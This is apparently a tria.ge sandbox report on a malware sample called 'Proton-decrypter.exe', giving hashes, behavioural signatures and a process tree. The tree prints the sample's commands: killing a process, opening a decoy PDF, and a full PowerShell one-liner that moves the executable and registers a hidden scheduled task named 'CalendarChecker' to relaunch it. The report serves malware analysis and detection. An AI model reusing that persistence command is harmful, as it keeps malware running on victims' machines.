Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 20:56
Static task
static1
Behavioral task
behavioral1
Sample
Proton-decrypter.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Proton-decrypter.exe
Resource
win10v2004-20231222-en
General
-
Target
Proton-decrypter.exe
-
Size
6.7MB
-
MD5
3ab86f13c521e72bf4e8475ccd1e62e3
-
SHA1
a1b2b1c4995ba4665d4db71653037f3075e111fb
-
SHA256
37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9
-
SHA512
a56fcf131a3de1a1395746edda0c038f9e39cfb63b8c96d788f9cb1c5d6a3f28d253543968a253b143bafd6ccc7f39ff8932097fca2a5e3076b87343afc8652b
-
SSDEEP
49152:5vdi5Ifm0OErygxEb6Ns/CRptmctcmZxDit3KowoLGi9VDUIvR62BZrXDbS06DSi:cIHO7cifwIvRtSjRWipG5YF+Oz
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: Proton-decrypter.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Explorer.7z Proton-decrypter.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
pid Process 2844 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000_CLASSES\spica Proton-decrypter.exe Set value (str) \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000_CLASSES\spica\ = "1" Proton-decrypter.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1892 AcroRd32.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 2056 Proton-decrypter.exe 2056 Proton-decrypter.exe 2056 Proton-decrypter.exe 2056 Proton-decrypter.exe 2804 powershell.exe 2804 powershell.exe 2804 powershell.exe 2056 Proton-decrypter.exe 2056 Proton-decrypter.exe 2056 Proton-decrypter.exe 2912 powershell.exe 2912 powershell.exe 2912 powershell.exe 2912 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeShutdownPrivilege 2056 Proton-decrypter.exe Token: SeDebugPrivilege 2844 taskkill.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeRestorePrivilege 2756 7zFM.exe Token: 35 2756 7zFM.exe Token: SeDebugPrivilege 2912 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2756 7zFM.exe 2756 7zFM.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1892 AcroRd32.exe 1892 AcroRd32.exe 1892 AcroRd32.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2056 wrote to memory of 2844 2056 Proton-decrypter.exe 29 PID 2056 wrote to memory of 2844 2056 Proton-decrypter.exe 29 PID 2056 wrote to memory of 2844 2056 Proton-decrypter.exe 29 PID 2056 wrote to memory of 2804 2056 Proton-decrypter.exe 31 PID 2056 wrote to memory of 2804 2056 Proton-decrypter.exe 31 PID 2056 wrote to memory of 2804 2056 Proton-decrypter.exe 31 PID 2056 wrote to memory of 2696 2056 Proton-decrypter.exe 32 PID 2056 wrote to memory of 2696 2056 Proton-decrypter.exe 32 PID 2056 wrote to memory of 2696 2056 Proton-decrypter.exe 32 PID 2696 wrote to memory of 1892 2696 cmd.exe 35 PID 2696 wrote to memory of 1892 2696 cmd.exe 35 PID 2696 wrote to memory of 1892 2696 cmd.exe 35 PID 2696 wrote to memory of 1892 2696 cmd.exe 35 PID 2056 wrote to memory of 1672 2056 Proton-decrypter.exe 38 PID 2056 wrote to memory of 1672 2056 Proton-decrypter.exe 38 PID 2056 wrote to memory of 1672 2056 Proton-decrypter.exe 38 PID 2804 wrote to memory of 2756 2804 powershell.exe 36 PID 2804 wrote to memory of 2756 2804 powershell.exe 36 PID 2804 wrote to memory of 2756 2804 powershell.exe 36 PID 2056 wrote to memory of 2912 2056 Proton-decrypter.exe 40 PID 2056 wrote to memory of 2912 2056 Proton-decrypter.exe 40 PID 2056 wrote to memory of 2912 2056 Proton-decrypter.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.exe"C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.exe"1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\system32\taskkill.exe"taskkill.exe" /PID 1256 /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Process -FilePath "C:\Windows\Explorer.7z" -WindowStyle Minimized2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Windows\Explorer.7z"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2756
-
-
-
C:\Windows\system32\cmd.exe"cmd" /c start "" "C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.pdf"2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.pdf"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1892
-
-
-
C:\Windows\system32\schtasks.exe"schtasks" /query /tn CalendarChecker2⤵PID:1672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -Command " $random = New-Object System.Random; $interval = $random.Next(1, 4); $sys_min = [int](Get-Date -format \"mm\") + (60 / $interval); $sys_sec = [int](Get-Date -format \"ss\") + (60 / $interval); $envir = $env:LOCALAPPDATA; $spica = (Get-Process -Id (Get-WmiObject Win32_Process -Filter \"ProcessId=$PID\").ParentProcessId).ProcessName.Replace(\"\r\n\",\"\") + \".exe\"; $file_path = (Get-Command -Name \"./$spica\").Source; Move-Item -Path $file_path -Destination $envir -Force; $action = New-ScheduledTaskAction -Execute ($envir + \"\$spica\") -Argument \"-WindowStyle Hidden\"; $settings = New-ScheduledTaskSettingsSet -DeleteExpiredTaskAfter (New-TimeSpan -Seconds 30) -ExecutionTimeLimit (New-TimeSpan -Hours 3) -RestartCount:3 -RestartInterval (New-TimeSpan -Minutes 10); $settings.StartWhenAvailable = $true; $description = \"Calendar\"; $taskName = \"CalendarChecker\"; $settings.DisallowStartIfOnBatteries = $false; $settings.StopIfGoingOnBatteries = $false; $trigger = New-ScheduledTaskTrigger -Daily -At (Get-Date).addSeconds(10); $trigger.StartBoundary = (Get-Date).AddHours($interval).addMinutes($sys_min).addSeconds($sys_sec).ToString(\"s\"); $trigger.EndBoundary = (Get-Date).AddDays(2).ToString(\"s\"); Register-ScheduledTask -TaskName $taskName -Description $description -Action $action -Settings $settings -Trigger $trigger; "2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
242KB
MD530a03040eeeb01b9d6ea7542712654da
SHA132767a0630e6b33d1355017e99b1b2cacd598093
SHA256a949ec428116489f5e77cefc67fea475017e0f50d2289e17c3eb053072adcf24
SHA512e204389f1cbfd74babeb948bab9e911a4565925996493a7aaf39cf2bb4d4d23a5ab5786eb829aa4b916582387e39f947f3a9fcf3edb240fc02832d26d860e4e9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RUNV8AJ2J9WZYD8AJKM4.temp
Filesize7KB
MD54564ca51b3659af058cb35196574663a
SHA166e715bf2803b9935ee23d0510f2a825142b35bd
SHA256b71ef447eb75e11263a067f3855efe0e4b14de37e71d84e9ffddb12f4b0c595d
SHA51281364d1bf874126f9d2e86b23ff3053656aca7361296831ee615917f033ff90acb35893ab3f5eb6a56b87bd69b1c61b01f7f171e46d53b7c357f45505d82b589
-
Filesize
66KB
MD5e302b2076f95bdbfe8b39679a15e3ce3
SHA1421710b728a323fbcc628316c4d41df291565157
SHA256b073f44de8f68134bdcd05017e42978638c3dad50a69639b50aa5180341164d1
SHA5127840a12ec275b762a4930ed349529cab4107308af17915418a19f49f11e3e413af81486e67c94ee6e44a44cfa9855e4a626739aaf1bea94b7fbc8bae2dd630c7